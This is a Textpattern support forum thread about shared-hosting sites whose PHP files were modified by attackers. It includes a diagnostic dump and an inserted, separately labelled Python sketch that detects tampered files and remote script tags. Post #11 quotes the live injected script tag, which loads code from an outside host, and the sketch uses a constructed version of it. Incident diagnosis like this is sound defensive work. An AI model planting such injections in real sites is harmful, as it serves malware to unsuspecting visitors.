
Textpattern CMS support forum


#1 2012-03-06 05:37:59

fowler
Member
Registered: 2007-02-12
Posts: 79

Issues with sites getting hacked.

A few of my sites have been hacked recently. PHP files are modified with offending code and new files are added to my server. I’m trying to figure out if this is a Textpattern issue or something with my host. I’m not really sure where to look first.

Any pointers would be great. I’d consider myself a novice when it comes to this sort of thing, so take it slow ;)


#2 2012-03-06 08:35:47

milosevic
Member
From: Madrid, Spain
Registered: 2005-09-19
Posts: 390

Re: Issues with sites getting hacked.

Fortunately for you, Textpattern stores the programming of pages in database tables, so if you haven’t done anything strange (like editing .htaccess), you can delete all Textpattern files and folders and upload a fresh set of Textpattern files. (Remember to save your config.php file, to establish the connection between Textpattern and the database, and the images and/or files uploaded as content.)

Anyway, before deleting, make a backup on your computer.

If the database hasn’t been hacked, the site will be clean.

Last edited by milosevic (2012-03-06 08:36:09)


<txp:rocks/>


#3 2012-03-06 08:58:38

Dragondz
Moderator
From: Algérie
Registered: 2005-06-12
Posts: 1,529

Re: Issues with sites getting hacked.

Hi

If some files have been added, can you say where that has been done and also which version of Textpattern you use?


#4 2012-03-06 12:37:44

wet
Developer Emeritus
From: Schoerfling, Austria
Registered: 2005-06-06
Posts: 3,323

Re: Issues with sites getting hacked.

Please post the output of the Textpattern diagnostics tab


#5 2012-03-06 17:04:50

colak
Admin
From: Cyprus
Registered: 2004-11-20
Posts: 9,011

Re: Issues with sites getting hacked.

I would change all my passwords including ftp and mysql


Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.


#6 2012-03-07 01:58:36

tye
Member
From: Pottsville, NSW
Registered: 2005-07-06
Posts: 859

Re: Issues with sites getting hacked.

If you are on shared hosting, I’d also check with your host to see if you are the only site which was hacked. I was hacked once, but it was due to an insecure site on the same server.


#7 2012-03-07 03:11:10

fowler
Member
Registered: 2007-02-12
Posts: 79

Re: Issues with sites getting hacked.

“If you are on shared hosting, I’d also check with your host to see if you are the only site which was hacked. I was hacked once, but it was due to an insecure site on the same server.”

It is in fact shared hosting. It’s happened multiple times on the same host, so that could most likely be it.

I’m switching to Media Temple VS.. anyone have any luck with them?

I would post a diagnostic dump, but I recently went through and updated everything in a panic. So far so good, but I figure it’s not going to last for long.

Installs have varied from 4.2 to 4.4.1.


#8 2012-03-07 03:14:46

fowler
Member
Registered: 2007-02-12
Posts: 79

Re: Issues with sites getting hacked.

Actually, just came across this:

- – - – - – -
Textpattern version: 4.4.1 (r3575)
Last Update: 2012-01-06 18:15:27/2012-02-22 03:18:35
Document root: /home/wag_redbull/faultline.redbullprojects.com
$path_to_site: /home/wag_redbull/faultline.redbullprojects.com
Textpattern path: /home/wag_redbull/faultline.redbullprojects.com/textpattern
Permanent link mode: section_id_title
Temporary directory path: /home/wag_redbull/faultline.redbullprojects.com/textpattern/tmp
Site URL: www.faultline.redbullprojects.com
PHP version: 5.2.17
GD Image Library: version bundled (2.0.34 compatible), supported formats: GIF, JPG, PNG
Server TZ: America/Los_Angeles
Server Local Time: 2012-03-06 19:20:08
DST enabled?: 0
Automatically adjust DST setting?: 0
Time Zone: America/Yakutat (-32400)
MySQL: 5.1.53-log
Locale: en_US.UTF-8
Server: Apache
PHP Server API: cgi-fcgi
RFC 2616 headers: 0
Server OS: Linux 2.6.32.45-grsec-2.2.2-r3
Active plugins: rss_auto_excerpt-0.5, lam_image_uploader-0.6c
Admin-side theme: classic 4.4.1

Pre-flight check:
————————————
/home/wag_redbull/faultline.redbullprojects.com/textpattern/setup/ still exists
Some Textpattern files have been modified: /home/wag_redbull/faultline.redbullprojects.com/index.php, /home/wag_redbull/faultline.redbullprojects.com/css.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/css.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/import/import_b2.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/import/import_blogger.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/import/import_mt.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/import/import_mtdb.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/import/import_wp.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_admin.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_article.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_auth.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_category.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_css.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_diag.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_discuss.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_file.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_form.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_image.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_import.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_link.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_list.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_log.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_page.php, 
/home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_plugin.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_prefs.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_section.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/include/txp_tag.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/index.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/IXRClass.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/admin_config.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/class.thumb.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/classTextile.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/constants.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/taglib.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_admin.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_db.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_forms.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_head.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_html.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_misc.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_theme.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_update.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/lib/txplib_wrapper.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/atom.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/comment.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/log.php, 
/home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/rss.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/search.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/publish/taghandlers.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/theme/classic/classic.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_1.0.0.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.2.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.3.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.4.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.5.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.6.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.7.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.0.8.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.2.0.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.3.0.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_to_4.4.0.php, /home/wag_redbull/faultline.redbullprojects.com/textpattern/update/_update.php
————————————

.htaccess file contents:
————————————
#DirectoryIndex index.php index.html

#Options +FollowSymLinks
#Options -Indexes
#ErrorDocument 403 default

<IfModule mod_rewrite.c>
RewriteEngine On
#RewriteBase /relative/web/path/

RewriteCond %{REQUEST_FILENAME} -f [OR]
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule ^(.+) - [PT,L]

RewriteCond %{REQUEST_URI} !=/favicon.ico
RewriteRule ^(.*) index.php

RewriteCond %{HTTP:Authorization} !^$
RewriteRule .* - [E=REMOTE_USER:%{HTTP:Authorization}]
</IfModule>

#php_value register_globals 0

————————————


#9 2012-03-07 03:43:28

maruchan
Member
From: Ukiah, California
Registered: 2010-06-12
Posts: 590

Re: Issues with sites getting hacked.

Can you post the contents of index.php?


#10 2012-03-07 04:07:43

tye
Member
From: Pottsville, NSW
Registered: 2005-07-06
Posts: 859

Re: Issues with sites getting hacked.

and remove the /setup/ folder

/home/wag_redbull/faultline.redbullprojects.com/textpattern/setup/ still exists


#11 2012-03-07 05:16:27

fowler
Member
Registered: 2007-02-12
Posts: 79

Re: Issues with sites getting hacked.

Setup folder has been removed.

This is the script that it’s injecting:

<script src="http://laprot98ocolle.rr.nu/mm.php?d=1"></script>

I’m also finding this stuff in WordPress installs on the same server.

Last edited by fowler (2012-03-07 05:17:06)

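Added example (not part of any post in this thread, and not Textpattern's own code): a Python sketch of the check behind the "files have been modified" diagnostic and the "upload a fresh set of files" advice, comparing a live install against an unpacked copy of the same release and flagging PHP files that carry a remote script tag like the one quoted above. The skip list, the directory layout in `demo()` and the host `injected.example` are assumptions constructed for illustration.

```python
import hashlib, re, tempfile
from pathlib import Path

# Remote <script src="http(s)://..."> tag: the shape of the injection quoted above.
REMOTE_SCRIPT = re.compile(rb'<script[^>]+src=["\']https?://([^/"\']+)', re.I)
# Assumption: paths that legitimately differ from a release archive.
SITE_SPECIFIC = ("textpattern/config.php", "files/", "images/", ".htaccess")

def digest(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def audit(live_root, clean_root):
    """Compare a live install against a fresh copy of the same release."""
    live_root, clean_root = Path(live_root), Path(clean_root)
    report = {"modified": [], "added": [], "remote_scripts": {}}
    for f in sorted(p for p in live_root.rglob("*") if p.is_file()):
        rel = f.relative_to(live_root).as_posix()
        hosts = {h.decode() for h in REMOTE_SCRIPT.findall(f.read_bytes())}
        if hosts and f.suffix == ".php":
            report["remote_scripts"][rel] = sorted(hosts)
        if rel.startswith(SITE_SPECIFIC):
            continue
        ref = clean_root / rel
        if not ref.is_file():
            report["added"].append(rel)        # not shipped in the release
        elif digest(f) != digest(ref):
            report["modified"].append(rel)     # differs from the release copy
    return report

def demo():
    """Build two small constructed trees and audit them."""
    tmp = Path(tempfile.mkdtemp())
    files = {"index.php": "<?php include 'textpattern/publish.php';",
             "textpattern/publish.php": "<?php // publish",
             "textpattern/lib/constants.php": "<?php // constants"}
    for root in ("clean", "live"):
        for rel, body in files.items():
            p = tmp / root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body)
    live = tmp / "live"
    (live / "textpattern/config.php").write_text("<?php // db settings")
    (live / "textpattern/lib/x.php").write_text("<?php // unknown file")
    with (live / "index.php").open("a") as fh:   # constructed injection
        fh.write('<script src="http://injected.example/mm.php?d=1"></script>')
    return audit(live, tmp / "clean")

if __name__ == "__main__":
    print(demo())
```

Files reported as added deserve the closest look, since a fresh upload overwrites modified core files but leaves unknown files in place.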

#12 2012-03-07 05:36:35

maruchan
Member
From: Ukiah, California
Registered: 2010-06-12
Posts: 590

Re: Issues with sites getting hacked.

I’m also finding this stuff in WordPress installs on the same server.

So have you ruled out an exploited WordPress vulnerability?
